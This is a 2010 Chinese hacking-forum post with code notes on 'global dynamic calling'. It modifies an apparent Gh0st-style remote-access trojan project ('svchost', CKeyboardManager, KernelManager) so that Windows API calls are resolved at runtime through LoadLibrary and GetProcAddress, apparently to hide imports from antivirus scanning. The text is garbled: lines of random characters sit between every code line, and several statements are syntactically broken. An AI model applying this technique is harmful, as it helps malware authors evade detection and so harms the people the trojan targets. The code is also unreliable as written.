标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
! x* r6 O" C* H4 L) M/ Y
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
2 C+ v$ G$ O) n6 c- w' E" }
----------------------------------------
4 s W% y1 Z3 ~
DTDY.h:
4 |2 p9 r k5 ?5 k
% A3 h/ o1 p2 c) T) f) S
#if _MSC_VER>1000
p- U& L2 y$ p5 N0 e6 B0 D: Q
#pragma once
4 [6 L; K* m+ J# L! N% G
#endif //_MSC_VER>1000
- J/ L" V# s4 z; ?& b% C G/ M
#include<windows.h>
. z9 K: a1 B6 u/ j* s
0 K: {1 U0 J' p7 P
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
3 ]7 B. }) ` L6 c' N
class DTDY
; _# _% \( G5 ]6 r- t$ Q) W
{
6 E8 E5 c$ z1 g- M7 Q/ t5 C0 h
public:
) }( Q2 j% H7 b+ |' i
DTDY();
& k6 `, b& Z P2 I7 H6 o1 b
virtual ~DTDY();
?; _% Y" |4 l& f- I" c
public:
9 d( R4 O0 |9 `1 h6 k. Q9 k9 x
static pGetModuleFileNameA MyGetModuleFileName;
C% ?3 s8 i' N- L% {9 u
static BOOL FunInitiallization();
$ `! U: W$ G/ ^
};
, N% z2 S& N [; \) S- W% A, ?7 D
#endif
. T/ c) }& g ~
----------------------------------------
% u M+ N) D2 A$ a3 r* q! U
! }7 z6 y' G9 W3 u8 U- x3 {- p# c
DTDY.cpp:
4 I, {1 g5 R. x1 i- n r F
2 q) W. I0 U' u( N9 r
#include "DTDY.h"
2 `( s% M) B: |0 P7 f0 }; R, B
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
; [2 U8 \0 d9 j
DTDY:TDY()
8 v+ Q+ z+ \8 }& p+ k. }) P
{
+ B7 M7 P+ I0 I \1 y
}
) ]$ a0 U: J2 k" `. @7 G: T
DTDY::~DTDY()
& z+ T$ f) y& i C
{
* P/ L1 n! q m6 \. d& k- i( p: ?4 J1 S
}
3 r' f! ~8 N$ [
BOOL DTDY::FunInitiallization()
0 w& |4 x# `$ H- v+ U
{
) f+ w% |& j) x
HMODULE hModule=LoadLibrary("kernel32.dll");
* F( y8 L Q8 L: x
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
) \: B$ Y0 ^8 z( O1 L) m: L, a
if(!MyGetModuleFileName=) return FALSE;
$ y, r& {! K( w; u$ h* ?! X4 U
5 p9 y [& {) ^! ?7 m9 X- ^" q3 Y
return TRUE;
3 J5 a8 {! x3 g v* N
}
; y7 g2 q# i I5 M; m6 \
----------------------------------------
( K% u M9 q1 @! \
svchost.cpp:
6 A5 Z2 D! b: l& `% U. z: N5 n, V
5 ]& p+ k$ [, V' f" A3 w
#include "DTDY.h"
7 ]- T- v: p0 D" f8 I
& e+ Y. Q1 F V6 j6 R
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
. W- M" Q M, L. a2 a" R
{
/ `! a+ A7 r8 ^7 n1 Z% ~; _# V3 d* D$ h
switch(ul_reason_for_call)
" H! _, E/ ?( J. J3 C0 h, r
{
. H7 o' S* G# F1 z$ W. F8 {
case DLL_PROCESS_ATTACH:
' O4 f8 a" Q& n
if(!DTDY::FunInitiallization()) return FALSE;
' Y: O- {/ l: g4 e$ `: y
9 q3 U+ {8 f Y
break;
- K* M* ^9 H; K9 E/ `
}
+ o, v6 D( s+ `9 C
}
# o: U# Q& [5 U1 b1 S
( R! o) H! g3 N, b* ]1 f
! h, u0 n+ ^0 [4 q2 m" r
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
8 b) h/ |# r! Q3 M5 m; C
改写为
1 y: w7 r, X! e: n# L6 s8 M
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
1 ^" V3 u1 R* h0 _2 w% K8 F
----------------------------------------
4 f9 }0 O! c: b7 B+ `5 y- \% W
KernelManager.cpp:
5 {# F9 j% D l1 Z( V* M
3 |2 {+ t6 k( H0 ^: }. I
#include "../DTDY.h"
2 U: {1 Z7 R) K
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
0 @! T0 D. ?/ u* s/ a
改写为
* G, L( {4 H* }- T1 O) M B
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
; y! \7 @9 R8 g
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
